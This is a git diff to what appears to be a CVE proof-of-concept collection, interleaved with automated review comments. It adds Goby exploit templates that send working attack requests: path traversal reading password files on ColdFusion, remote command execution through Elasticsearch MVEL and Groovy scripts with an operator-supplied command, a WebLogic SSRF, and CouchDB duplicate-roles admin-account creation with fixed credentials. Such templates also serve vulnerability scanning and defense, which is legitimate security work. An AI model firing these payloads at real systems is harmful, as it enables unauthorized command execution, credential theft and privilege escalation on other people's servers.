diff --git a/.gitignore b/.gitignore
index e3ac20b31..d17d448ef 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1 @@
-script/
-CVE-2021-41773/
\ No newline at end of file
+script/
\ No newline at end of file
diff --git a/2010/CVE-2010-1871/poc/xray/CVE-2010-1871.yaml b/2010/CVE-2010-1871/poc/xray/CVE-2010-1871.yml
similarity index 100%
rename from 2010/CVE-2010-1871/poc/xray/CVE-2010-1871.yaml
rename to 2010/CVE-2010-1871/poc/xray/CVE-2010-1871.yml
diff --git a/2010/CVE-2010-2861/poc/goby/CVE-2010-2861.json b/2010/CVE-2010-2861/poc/goby/CVE-2010-2861.json
new file mode 100644
index 000000000..4ea668170
--- /dev/null
+++ b/2010/CVE-2010-2861/poc/goby/CVE-2010-2861.json
@@ -0,0 +1,103 @@
+{
+ "Name": "Coldfusion LFI CVE-2010-2861",
+ "Level": "2",
+ "Tags": [
+ "lfi"
+ ],
+ "GobyQuery": "app=\"Adobe-ColdFusion\"",
+ "Description": "Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.",
+ "Product": "Adobe ColdFusion",
+ "Homepage": "https://www.adobe.com/products/coldfusion-family.html",
+ "Author": "aetkrad",
+ "Impact": "
read arbitrary files
",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "Filepath",
+ "Type": "select",
+ "Value": "../../../../../../../../../../etc/passwd%00en,../../../../../../../lib/password.properties%00en"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "rdspassword=",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "encrypted=",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/CFIDE/administrator/enter.cfm?locale={{{cmd}}}",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-08 15:51:21",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
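Review bot: The `"Impact"` value in this template spans three physical lines (`"Impact": "`, `read arbitrary files`, `",`) with unescaped line breaks, which is not a valid JSON string; collapse it to `"Impact": "read arbitrary files",`. ExpParams declares a parameter named `Filepath`, but ExploitSteps interpolates `{{{cmd}}}`, so one of the two names is stale and the selected value never reaches the request. ExpParams keys are capitalised (`Name`/`Type`/`Value`) while the Go templates in this commit use `name`/`type`/`value`; worth confirming which spelling the loader honours, since an unrecognised block is silently ignored. `"Recommendation": ""` and `"References": []` are empty; the remediation (upgrade to a fixed ColdFusion release and restrict access to `/CFIDE/administrator/`) and a vendor reference belong there so a positive result is actionable.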
diff --git a/2010/CVE-2010-2861/poc/xray/CVE-2010-2861.yaml b/2010/CVE-2010-2861/poc/xray/CVE-2010-2861.yml
similarity index 100%
rename from 2010/CVE-2010-2861/poc/xray/CVE-2010-2861.yaml
rename to 2010/CVE-2010-2861/poc/xray/CVE-2010-2861.yml
diff --git a/2012/CVE-2012-1823/poc/xray/CVE-2012-1823.yaml b/2012/CVE-2012-1823/poc/xray/CVE-2012-1823.yml
similarity index 100%
rename from 2012/CVE-2012-1823/poc/xray/CVE-2012-1823.yaml
rename to 2012/CVE-2012-1823/poc/xray/CVE-2012-1823.yml
diff --git a/2014/CVE-2014-3120/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go b/2014/CVE-2014-3120/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go
new file mode 100644
index 000000000..731443ae8
--- /dev/null
+++ b/2014/CVE-2014-3120/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go
@@ -0,0 +1,191 @@
+package exploits
+
+import (
+ "git.gobies.org/goby/goscanner/goutils"
+)
+
+func init() {
+ expJson := `{
+ "Name": "Elasticsearch Remote Code Execution CVE-2014-3120",
+ "Description": "The default configuration before Elasticsearch 1.2 enabled dynamic scripting, which allowed remote attackers to execute arbitrary MVEL expressions and Java code through the source parameter of _search.",
+ "Product": "Elasticsearch",
+ "Homepage": "https://gobies.org/",
+ "DisclosureDate": "2021-04-10",
+ "Author": "zhzyker",
+ "GobyQuery": "product=elasticsearch",
+ "Level": "3",
+ "Impact": "ElasticSearch is an open source, distributed, RESTful search engine built on Lucene. Designed for use in cloud computing, it can achieve real-time, stable, reliable and fast search, and is easy to install and use. Supports data indexing via HTTP request and using JSON.
Since ElasticSearch has enabled dynamic script execution by default, any user can execute arbitrary Java code by constructing a specially crafted submission.
",
+ "Recommandation": "The official version of elasticsearch 1.2 has been publicly released, and the dynamic script execution function is disabled by default.
",
+ "References": [
+ "https://github.com/zhzyker"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "cmd",
+ "type": "input",
+ "value": "whoami"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/website/blog/",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{ \"name\": \"cve-2014-3120\" }"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": "http_code"
+ }
+ ]
+ },
+ "SetVariable": []
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/_search?pretty",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"echo 0d455d3d2044e6e7781771d932e68dbc_goby_nb\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "0d455d3d2044e6e7781771d932e68dbc",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/website/blog/",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{ \"name\": \"cve-2014-3120\" }"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": "http_code"
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/_search?pretty",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"{{{cmd}}}\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": "http_code"
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|(?s)\"command\" : (.*)}"
+ ]
+ }
+ ],
+ "Tags": [
+ "RCE"
+ ],
+ "CVEIDs": null,
+ "CVSSScore": "0.0",
+ "AttackSurfaces": {
+ "Application": null,
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ }
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ nil,
+ nil,
+ ))
+}
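Review bot: The first ScanSteps request (`"method": "POST"`, `"uri": "/website/blog/"`) writes a document into the target's index during what is labelled a detection scan, so every scan leaves persistent data behind and appears in the target's logs as a write; this should be stated in `"Impact"` so operators know the check is not read-only. The `"Impact"` and `"Recommandation"` strings contain raw line breaks (the lines following `"Impact": "ElasticSearch is an open source…`), which strict JSON parsers reject; escape them as `\n` inside the raw string literal. The key is spelled `Recommandation` here while CVE-2010-2861.json and CVE-2017-12635.json use `Recommendation`; if the loader only reads one spelling, the remediation text is dropped without an error. The Go wrapper itself is fine for what it does, but a one-line comment above `expJson` naming the CVE and noting that the JSON is handed verbatim to `ExpManager.AddExploit` would help readers who only see this file. The same three points apply to Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go.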
diff --git a/2014/CVE-2014-3120/poc/xray/CVE-2014-3120.yaml b/2014/CVE-2014-3120/poc/xray/CVE-2014-3120.yml
similarity index 100%
rename from 2014/CVE-2014-3120/poc/xray/CVE-2014-3120.yaml
rename to 2014/CVE-2014-3120/poc/xray/CVE-2014-3120.yml
diff --git a/2014/CVE-2014-3704/poc/xray/CVE-2014-3704.yaml b/2014/CVE-2014-3704/poc/xray/CVE-2014-3704.yml
similarity index 100%
rename from 2014/CVE-2014-3704/poc/xray/CVE-2014-3704.yaml
rename to 2014/CVE-2014-3704/poc/xray/CVE-2014-3704.yml
diff --git "a/2014/CVE-2014-4210/poc/goby/Weblogic SSRF\346\274\217\346\264\236 CVE-2014-4210.json" "b/2014/CVE-2014-4210/poc/goby/Weblogic SSRF\346\274\217\346\264\236 CVE-2014-4210.json"
new file mode 100644
index 000000000..852ef4861
--- /dev/null
+++ "b/2014/CVE-2014-4210/poc/goby/Weblogic SSRF\346\274\217\346\264\236 CVE-2014-4210.json"
@@ -0,0 +1,101 @@
+{
+ "Name": "Weblogic SSRF漏洞 CVE-2014-4210",
+ "Level": "2",
+ "Tags": [
+ "SSRF"
+ ],
+ "GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
+ "Description": "Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件,此漏洞可通过HTTP协议利用,未经身份验证的远程攻击者可利用此漏洞影响受影响组件的机密性\n\nOracle WebLogic Server 10.0.2.0\nOracle WebLogic Server 10.3.6.0\n\nhttp://xxx.xxx.xxx.xxx:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://xxx.xxx.xxx.xxx:7001",
+ "Product": "Oracle WebLogic Server",
+ "Homepage": "https://www.oracle.com",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐑
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp":true,
+ "ExpParams":[
+ {
+ "name":"payload",
+ "type":"input",
+ "value":"127.0.0.1:7001",
+ "show":""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/uddiexplorer/SearchPublicRegistries.jsp",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Search",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "OR",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
+ "follow_redirect": false,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+
+ "SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
+ "follow_redirect": false,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+
+ "SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
+ "follow_redirect": false,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+
+ "SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
+ }
+ ],
+ "PostTime": "2021-01-23 20:47:39",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
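Review bot: ExploitSteps under `"OR"` contains the same request three times (identical `uri`, `header` and `SetVariable`), which only triples the traffic sent to the target; one entry is enough. None of the three has a `ResponseTest`, unlike every other template in this commit, so an error page is reported the same way as a real result. `"Impact": "咩咩咩🐑"` and `"Recommandation": "undefined"` are placeholders (the Laravel .env template in this commit has the same problem); the Description already lists the affected builds, so Impact can say that an unauthenticated client can make the server issue HTTP requests to internal hosts, and Recommandation can point to the vendor patch for the affected WebLogic releases. Both strings also end with a raw line break before the closing quote, which is not valid JSON. The `title=="Error 404--Not Found"` clause in `GobyQuery` matches many servers that are not WebLogic, so the exploit request — which targets `127.0.0.1:7001` by default — will be sent to hosts that cannot be affected; a narrower fingerprint reduces both noise and unintended traffic.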
diff --git a/2014/CVE-2014-6271/poc/xray/CVE-2014-6271.yaml b/2014/CVE-2014-6271/poc/xray/CVE-2014-6271.yml
similarity index 100%
rename from 2014/CVE-2014-6271/poc/xray/CVE-2014-6271.yaml
rename to 2014/CVE-2014-6271/poc/xray/CVE-2014-6271.yml
diff --git a/2015/CVE-2015-1427/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go b/2015/CVE-2015-1427/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go
new file mode 100644
index 000000000..30b815711
--- /dev/null
+++ b/2015/CVE-2015-1427/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go
@@ -0,0 +1,198 @@
+package exploits
+
+import (
+ "git.gobies.org/goby/goscanner/goutils"
+)
+
+func init() {
+ expJson := `{
+ "Name": "Elasticsearch Remote Code Execution CVE-2015-1427",
+ "Description": "The Groovy script engine before Elasticsearch 1.3.8 and the Groovy script engine in 1.4.x before 1.4.3 allow remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands through elaborate scripts.",
+ "Product": "Elasticsearch",
+ "Homepage": "https://www.elastic.co/cn/elasticsearch/",
+ "DisclosureDate": "2021-04-11",
+ "Author": "zhzyker",
+ "GobyQuery": "product=elasticsearch",
+ "Level": "3",
+ "Impact": "In 2014, a remote code execution vulnerability (CVE-2014-3120) was exposed. The vulnerability appeared in the script query module. Since search engines support the use of script code (MVEL) as an expression for data manipulation, attackers can use MVEL Construct and execute arbitrary java code,
Later, the scripting language engine was changed to Groovy and a sandbox was added to control it. Dangerous codes would be intercepted. As a result, this time because the sandbox restrictions were not strict, it led to remote code execution.
",
+ "Recommandation": "Close the groovy sandbox to stop the use of dynamic scripts:
script.groovy.sandbox.enabled: false
",
+ "References": [
+ "https://github.com/zhzyker"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "cmd",
+ "type": "input",
+ "value": "whoami"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/website/blog/",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{ \"name\": \"cve-2015-1427\" }"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/_search?pretty",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/text"
+ },
+ "data_type": "text",
+ "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"echo 460f7ccb583e25e09c0fe100a2c9e90d\\\").getText()\"}}}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "460f7ccb583e25e09c0fe100a2c9e90d",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/website/blog/",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{ \"name\": \"cve-2015-1427\" }"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/_search?pretty",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/text"
+ },
+ "data_type": "text",
+ "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"{{{cmd}}}\\\").getText()\"}}}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "460f7ccb583e25e09c0fe100a2c9e90d",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|(?s)\"lupin\" : \\[ \"(.*)\" \\]"
+ ]
+ }
+ ],
+ "Tags": [
+ "RCE"
+ ],
+ "CVEIDs": null,
+ "CVSSScore": "0.0",
+ "AttackSurfaces": {
+ "Application": null,
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ }
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ nil,
+ nil,
+ ))
+}
\ No newline at end of file
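Review bot: `"DisclosureDate": "2021-04-11"` records when the template was written, not when a 2015 CVE was disclosed, and `"CVEIDs": null` with `"CVSSScore": "0.0"` leave the identifier and severity out of the structured fields even though the Name carries CVE-2015-1427. Anything that filters or reports on these templates by CVE ID, date or score will therefore miss this entry; the same applies to Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go (`"DisclosureDate": "2021-04-10"`, `"Homepage": "https://gobies.org/"` instead of the product site). `"References"` lists only the author's GitHub profile; the vendor advisory for the Groovy sandbox fix is what a defender reading a result needs. The `"Recommandation"` text gives `script.groovy.sandbox.enabled: false` as the fix, but the Description says the vulnerable versions are before 1.3.8 and 1.4.x before 1.4.3, so upgrading should be listed first with the setting as an interim mitigation.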
diff --git a/2015/CVE-2015-1427/poc/xray/CVE-2015-1427.yaml b/2015/CVE-2015-1427/poc/xray/CVE-2015-1427.yml
similarity index 100%
rename from 2015/CVE-2015-1427/poc/xray/CVE-2015-1427.yaml
rename to 2015/CVE-2015-1427/poc/xray/CVE-2015-1427.yml
diff --git a/2015/CVE-2015-3337/poc/xray/CVE-2015-3337.yaml b/2015/CVE-2015-3337/poc/xray/CVE-2015-3337.yml
similarity index 100%
rename from 2015/CVE-2015-3337/poc/xray/CVE-2015-3337.yaml
rename to 2015/CVE-2015-3337/poc/xray/CVE-2015-3337.yml
diff --git a/2015/CVE-2015-5531/poc/xray/CVE-2015-5531.yaml b/2015/CVE-2015-5531/poc/xray/CVE-2015-5531.yml
similarity index 100%
rename from 2015/CVE-2015-5531/poc/xray/CVE-2015-5531.yaml
rename to 2015/CVE-2015-5531/poc/xray/CVE-2015-5531.yml
diff --git a/2015/CVE-2015-7297/poc/xray/CVE-2015-7297.yaml b/2015/CVE-2015-7297/poc/xray/CVE-2015-7297.yml
similarity index 100%
rename from 2015/CVE-2015-7297/poc/xray/CVE-2015-7297.yaml
rename to 2015/CVE-2015-7297/poc/xray/CVE-2015-7297.yml
diff --git a/2015/CVE-2015-8399/poc/xray/CVE-2015-8399.yaml b/2015/CVE-2015-8399/poc/xray/CVE-2015-8399.yml
similarity index 100%
rename from 2015/CVE-2015-8399/poc/xray/CVE-2015-8399.yaml
rename to 2015/CVE-2015-8399/poc/xray/CVE-2015-8399.yml
diff --git a/2016/CVE-2016-10134/poc/xray/CVE-2016-10134.yaml b/2016/CVE-2016-10134/poc/xray/CVE-2016-10134.yml
similarity index 100%
rename from 2016/CVE-2016-10134/poc/xray/CVE-2016-10134.yaml
rename to 2016/CVE-2016-10134/poc/xray/CVE-2016-10134.yml
diff --git a/2016/CVE-2016-3088/poc/xray/CVE-2016-3088.yaml b/2016/CVE-2016-3088/poc/xray/CVE-2016-3088.yml
similarity index 100%
rename from 2016/CVE-2016-3088/poc/xray/CVE-2016-3088.yaml
rename to 2016/CVE-2016-3088/poc/xray/CVE-2016-3088.yml
diff --git a/2016/CVE-2016-4977/poc/xray/CVE-2016-4977.yaml b/2016/CVE-2016-4977/poc/xray/CVE-2016-4977.yml
similarity index 100%
rename from 2016/CVE-2016-4977/poc/xray/CVE-2016-4977.yaml
rename to 2016/CVE-2016-4977/poc/xray/CVE-2016-4977.yml
diff --git a/2017/CVE-2017-1000028/poc/xray/CVE-2017-1000028.yaml b/2017/CVE-2017-1000028/poc/xray/CVE-2017-1000028.yml
similarity index 100%
rename from 2017/CVE-2017-1000028/poc/xray/CVE-2017-1000028.yaml
rename to 2017/CVE-2017-1000028/poc/xray/CVE-2017-1000028.yml
diff --git a/2017/CVE-2017-10271/poc/xray/CVE-2017-10271.yaml b/2017/CVE-2017-10271/poc/xray/CVE-2017-10271.yml
similarity index 100%
rename from 2017/CVE-2017-10271/poc/xray/CVE-2017-10271.yaml
rename to 2017/CVE-2017-10271/poc/xray/CVE-2017-10271.yml
diff --git a/2017/CVE-2017-11610/poc/xray/CVE-2017-11610.yaml b/2017/CVE-2017-11610/poc/xray/CVE-2017-11610.yml
similarity index 100%
rename from 2017/CVE-2017-11610/poc/xray/CVE-2017-11610.yaml
rename to 2017/CVE-2017-11610/poc/xray/CVE-2017-11610.yml
diff --git a/2017/CVE-2017-12615/poc/xray/CVE-2017-12615.yaml b/2017/CVE-2017-12615/poc/xray/CVE-2017-12615.yml
similarity index 100%
rename from 2017/CVE-2017-12615/poc/xray/CVE-2017-12615.yaml
rename to 2017/CVE-2017-12615/poc/xray/CVE-2017-12615.yml
diff --git a/2017/CVE-2017-12629/poc/xray/CVE-2017-12629.yaml b/2017/CVE-2017-12629/poc/xray/CVE-2017-12629.yml
similarity index 100%
rename from 2017/CVE-2017-12629/poc/xray/CVE-2017-12629.yaml
rename to 2017/CVE-2017-12629/poc/xray/CVE-2017-12629.yml
diff --git a/2017/CVE-2017-12635/poc/goby/CVE-2017-12635.json b/2017/CVE-2017-12635/poc/goby/CVE-2017-12635.json
new file mode 100644
index 000000000..2f8adc091
--- /dev/null
+++ b/2017/CVE-2017-12635/poc/goby/CVE-2017-12635.json
@@ -0,0 +1,110 @@
+{
+ "Name": "Couchdb Add User Not Authorized CVE-2017-12635",
+ "Level": "3",
+ "Tags": [
+ "Ultra vires"
+ ],
+ "GobyQuery": "app=\"APACHE-CouchDB\"",
+ "Description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.",
+ "Product": "APACHE-CouchDB",
+ "Homepage": "http://couchdb.apache.org",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "创建用户",
+ "Type": "select",
+ "Value": "CanIHelpYou:NoThank"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "PUT",
+ "uri": "/_users/org.couchdb.user:{{{str1}}}",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/json"
+ },
+ "data_type": "text",
+ "data": " {\n \"type\": \"user\",\n \"name\": \"{{{str1}}}\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"{{{str2}}}\"\n }",
+ "set_variable": [
+ "str1|rand|str|32",
+ "str2|rand|str|64"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "org.couchdb.user:{{{r1}}}",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "PUT",
+ "uri": "/_users/org.couchdb.user:CanIHelpYou",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/json"
+ },
+ "data_type": "text",
+ "data": " {\n \"type\": \"user\",\n \"name\": \"CanIHelpYou\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"NoThank\"\n }",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "org.couchdb.user:CanIHelpYou",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-10 19:52:21",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
